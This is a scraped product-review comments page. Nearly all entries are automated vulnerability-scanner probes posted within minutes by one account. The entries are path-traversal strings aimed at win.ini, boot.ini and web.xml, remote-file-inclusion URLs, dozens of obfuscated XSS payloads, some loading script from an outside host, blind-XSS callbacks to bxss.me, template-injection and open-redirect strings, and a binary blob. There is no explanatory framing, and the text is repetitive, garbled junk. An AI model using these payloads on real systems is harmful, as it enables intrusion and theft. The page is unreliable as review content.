Was this review helpful? Yes No (0/0)
Mr.
../../../../../../../../../../windows/win.ini
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
Http://testasp.vulnweb.com/t/fit.txt
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
http://testasp.vulnweb.com/t/fit.txt?.jpg
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
../../../../../../../../../../boot.ini
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
testasp.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
../../../../../../../../../../windows/win.ini.jpg
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.
1
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
12345'"\'\");|]*{
<>�''💩
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
1some_inexistent_file_with_long_name.
1
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
������������������������������������������������windows��win.ini
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Http://testasp.vulnweb.com/t/fit.txt
1
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
................windowswin.ini
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
http://testasp.vulnweb.com/t/fit.txt?.
1
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
testasp.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
..\..\..\..\..\..\..\..\windows\win.ini
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.
1
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
1some_inexistent_file_with_long_name.
1
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Http://testasp.vulnweb.com/t/fit.txt
1
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
12345'"\'\");|]*{ <>�''💩
1
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
1&n919952=v911026
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
http://testasp.vulnweb.com/t/fit.txt?.
1
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.&n978842=v952101
1
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
testasp.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
http://testasp.vulnweb.com/t/xss.html?%00.jpg
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
http://testasp.vulnweb.com/t/xss.html?%00.jpg
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
1some_inexistent_file_with_long_name.
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
WEB-INF/web.xml
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
http://testasp.vulnweb.com/t/xss.html?%00.jpg
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
645
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Http://testasp.vulnweb.com/t/fit.txt
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
http://testasp.vulnweb.com/t/xss.html?%00.jpg
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
WEB-INF\web.xml
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
http://testasp.vulnweb.com/t/fit.txt?.
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
645
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
http://testasp.vulnweb.com/t/xss.html?%00.jpg
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
../../../../../../../../../../windows/win.ini
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
12345'"\'\");|]*{ <>�''💩
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
testasp.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
645/.
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
http://testasp.vulnweb.com/t/xss.html?%00.jpg
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
../../../../../../../../../../boot.ini
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
645
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
http://hitSQbk53wgns.bxss.me/
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
../../../../../../../../../../windows/win.ini.
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
645
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
http://hitMcn1vhCGVk.bxss.me/
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
������������������������������������������������windows��win.ini
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
645/.
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
http://hitXXLHUSLdF7.bxss.me/
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
645
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
http://hiteZoCpuGNaj.bxss.me/
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
................windowswin.ini
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
645
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
12345'"\'\");|]*{ <>�''💩
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
http://hitfBt1FRLg6p.bxss.me/
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
645/.
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
http://hitB6p6OHqQ7S.bxss.me/
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
..\..\..\..\..\..\..\..\windows\win.ini
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
645
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
/www.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
645
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
954990
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
1'"()&%<acx><ScRiPt >prompt(999986)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
645/.
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
http://www.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
'"()&%<acx><ScRiPt >prompt(949427)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
645
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
1_935810
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
645
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
645/.
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
645
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
//www.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
645
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
WEB-INF/web.xml
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
645/.
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
WEB-INF\web.xml
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
acu10229<s1﹥s2ʺs3ʹuca10229
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
../../../../../../../../../../windows/win.ini
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
/\www.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
../../../../../../../../../../boot.ini
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
acux3811��z1��z2a�bcxuca3811
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
/www.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
925572
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
../../../../../../../../../../windows/win.ini.
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
http://www.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
CWS000x�=�1N�@E߮��I)�@��  �HiP"D�F� G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)� x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g�
]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0  
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
������������������������������������������������windows��win.ini
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
{{10000341*9999180}}
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
................windowswin.ini
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt >prompt(960952)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
1<script>prompt(975673)</script>
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
//www.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
..\..\..\..\..\..\..\..\windows\win.ini
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScR<ScRiPt>IpT>prompt(972490)</sCr<ScRiPt>IpT>
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt
>prompt(947887)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?921792></ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt
>prompt(971227)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
/\www.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
1<video><source onerror="javascript:prompt(939691)">
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
1<svg  

�onload=prompt(930316);>
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
1%3Csvg%20onload%3Dprompt(973321)%3E
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
1<isindex type=image src=1 onerror=prompt(959364)>
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
/www.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
WEB-INF/web.xml
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
1<div style=width:expression(prompt(976317))>
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
959955
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
WEB-INF\web.xml
1
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='972172'>
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
http://www.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:23 PM
Was this review helpful? Yes No (0/0)
Mr.
1<body onload=prompt(997530)>
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
../../../../../../../../../../windows/win.ini
1
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(934666)>
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img src=xyz OnErRor=prompt(966825)>
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
../../../../../../../../../../boot.ini
1
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
Mr.
//www.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img/src=">" onerror=alert(919814)>
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
../../../../../../../../../../windows/win.ini.
1
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt%20>prompt(909139)</sCripT>
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
Mr.
1\u003CScRiPt\u003Eprompt(964380)\u003C/sCripT\u003E
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
Mr.
/\www.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
������������������������������������������������windows��win.ini
1
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
Mr.
1&lt;ScRiPt&gt;prompt(936110)&lt;/sCripT&gt;
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
................windowswin.ini
1
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
Mr.
�<img acu onmouseover=prompt(989800) //�>
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
Mr.
1<input autofocus onfocus=prompt(944822)>
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
/www.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
..\..\..\..\..\..\..\..\windows\win.ini
1
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
Mr.
<a HrEF=http://www.vulnweb.com></a>
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
944274
1
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
Mr.
<a HrEF=jaVaScRiPT:>
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
1
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
http://www.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
Mr.
[url=http://www.vulnweb.com][/url]
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img<!-- --> src=x onerror=alert(945239);//><!-- -->
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
1
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
Mr.
1}body{acu:Expre/**/SSion(prompt(910845))}
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
1
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
//www.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
Mr.
1<% contenteditable onresize=prompt(910671)>
From: yebglfyh | Date: 4/15/2016 10:24 PM
Was this review helpful? Yes No (0/0)
Mr.
1_PtDL6
<ScRiPt >prompt(968785)</ScRiPt>
